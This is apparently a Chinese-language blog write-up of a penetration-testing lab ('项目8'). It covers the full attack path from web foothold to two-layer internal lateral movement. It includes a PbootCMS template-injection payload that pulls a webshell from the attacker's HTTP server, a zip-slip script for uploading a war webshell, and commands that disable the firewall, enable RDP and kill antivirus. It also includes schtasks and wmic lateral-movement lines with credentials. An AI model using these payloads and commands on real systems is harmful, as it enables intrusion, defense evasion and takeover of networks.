项目8

信息收集

  1. 使用nmap 判断找到ip

    image-20240405210535717

    得到ip

    192.168.79.179

  2. 端口信息收集

    image-20240405211058126

web 打点

21

尝试爆破ftp

image-20240405212947093

没有结果

22

爆破,没有结果

80

cms

image-20240405211210308

  1. 尝试web 路径爆破

    并没有什么作用

  2. 根据提示绑定域名

    C:\WINDOWS\system32\drivers\etc

    打开hosts

    添加这个

    image-20240405224407975

    image-20240405224341552

    出现了一个神奇玩意儿

    尝试爆破一下路径

    image-20240405225126730

    image-20240405225711029

    尝试观看日志

    image-20240405230218272

    发现版本

    下载config

    image-20240405230439812

    获取了sqlite

    image-20240405235507726

    会获取db 文件,然后尝试连接

    image-20240405235710610

    获取密码

    8187bef2c0b83e6b0b747d92b0a65eb1

    尝试解密

    image-20240406000148928

    image-20240406000213456

    两次解密获取密码

    admin7788

    尝试登录

    image-20240406000312330

    image-20240406000403246

    登录成功

    CVE-2020-23580 PBootCMS安全漏洞浅析 - 先知社区 (aliyun.com)

    根据漏洞利用,写info

    image-20240406124701379

    1
    {pbootpbootpboot:if:if:if(fputs(fopen("info.php","w"),"<?php+".chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)."();?>"))}yyy{/pbootpbootpboot:if:if:if}

    url 编码

    1
    {pbootpbootpboot:if:if:if(fputs(fopen("info.php","w"),"<?php ".chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)."();?>"))}yyy{/pbootpbootpboot:if:if:if}

    然后。。。并没有反应

    尝试第二个方法

    最新0day! PbootCMS全版本后台通杀任意代码执行漏洞_pbootcms 3.2.5漏洞-CSDN博客

    利用失败

    尝试第三个方法

    image-20240406134246991

    添加payload 

    1
    {pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['3','.php']), implode('',['<dut_','contentsd,'"shell.php",','file','_get_','contents("','http://192.168.79.1:8000/getshell.txt"))?>'])))}!!!{/pboot:if}

    注意将对应的ip 改成自己的http server 的服务

    image-20240406134424963

    注意提交

    然后随便访问3.php
    image-20240406134452694

    可见成功写入

    尝试访问shell.php

    image-20240406134543855

    没有丝毫问题

    尝试蚁剑连接

    image-20240406134727308

上线msf

生成一个payload

image-20240406135330740

上传到靶机

image-20240406135424209

开启监听

image-20240406140027659

上线

image-20240406135556387

发现不能执行,使用蚁剑绕过

image-20240406135642972

image-20240406140045262

然后执行就发现上线了
image-20240406140124055

image-20240406143204104

搜索提权漏洞(msf 使用getsystem 会有点问题,就直接搜索漏洞提权)

image-20240406143924118

image-20240406143820430

使用第二个提权成功

image-20240406143947029

image-20240406143959572

查到flag

除此之外还可以使用 docker 进行提权

官方的wp 是通过下载对方的私钥然后及进行ssh

然后使用docker 进行提权

内网信息收集

  1. 网段信息收集

    image-20240406140509274

  2. 使用fscan 进行信息收集

    image-20240406140553823

    尝试

    image-20240406145605168

    并没有发现什么

  3. nmap

    发现没有nmap 下载一个

    image-20240406145706114

    image-20240406145725998

    发现还存在178 果然还得是namp

  4. 178 端口信息收集

内网横向移动

178

8080

image-20240406150230618

又是一个cms

发现登录页面,并且没有验证码,本来想爆破的,但是直接试出来了

admin

123456

image-20240406150557210

找一下漏洞

image-20240406150916953

在最底端发现后台

一次历史漏洞分析与复现的全部过程_jspxcms idea-CSDN博客

image-20240406151254198

制作恶意的zip 

1
2
3
4
5
6
7
8
9
10
11
12
import zipfile 
if __name__ == "__main__":
    try:
        binary = b'test' 
        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("test.zip")
        with open('ant.war', 'rb') as file:
            binary_data = file.read()
            zipFile.writestr("../../../ant.war", binary_data)
        zipFile.close() 
    except IOError as e:
        raise e

尝试上传war 包的zip 然后上传之后,cms 自动解压为war 然后经过tomcat 的解压将war 变成jsp

image-20240406155104587

然后上传这个

然后尝试访问

image-20240406155229164

上线msf

image-20240406155352924

image-20240406162900351

发现上线msf 有一点问题,杀软直接让payload 消失了

先收集杀软的信息

1
tasklist

image-20240406162356804

然后获取

image-20240406162437415

发现两个杀软

查看防火墙信息

1
netsh advfirewall show allprofiles

关闭防火墙

1
netsh advfirewall set allprofiles state off

image-20240406162723367

制作免杀,针对360

image-20240427161515227

上传成功

刚好制作cs 的raw 进行绕过,发现并不行,只要上传windows defender 就会

那就基于msf 做渗透

或者使用联动

尝试使用联动

image-20240427163515687

发现迟迟不上线

然后发现了原来靶机出了问题

提权,收集信息

image-20240427191316245

image-20240427191308380

获得密码

想到的是通过rdp将360这个恶心的东西关了

开启远程桌面

1
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

image-20240427191907447

有问题?

尝试直接杀掉

image-20240427192458676

舒服了

二层内网信息收集

  1. ip 信息收集

    image-20240422193313122

    发现还存在10.10.1.1 网段

  2. 尝试上传fscan

    这个上传不太行

  3. 尝试使用msf 进行存货探测

    使用arp 进行内网存活探测,挺慢的image-20240427211457653

  4. 尝试搭建代理

    • 使用stowaway

    • 使用msf

      image-20240427171649212

      image-20240427171831589

      image-20240427171929852

二层内网横向移动

  1. 没有思路

    尝试IPC

    image-20240427211623667

    发现可以成功连接

    刚好发现copy 指令也是可以使用

    image-20240427212146865

    上传一个正向的payload 然后连接

    image-20240427212958778

    1
    SCHTASKS /Create /S 10.10.1.130 /u administrator /p QWEasd123 /SC ONCE /ST 22:20 /TN test1 /TR c:\windows\temp\august_bind_20091.exe /RU system
    1
    wmic /node:10.10.1.130 /user:administrator /password:QWEasd123 process list brief
#靶场记录
项目8
https://tsy244.github.io/2024/04/05/靶场记录/项目8/
Author
August Rosenberg
Posted on
April 5, 2024
Licensed under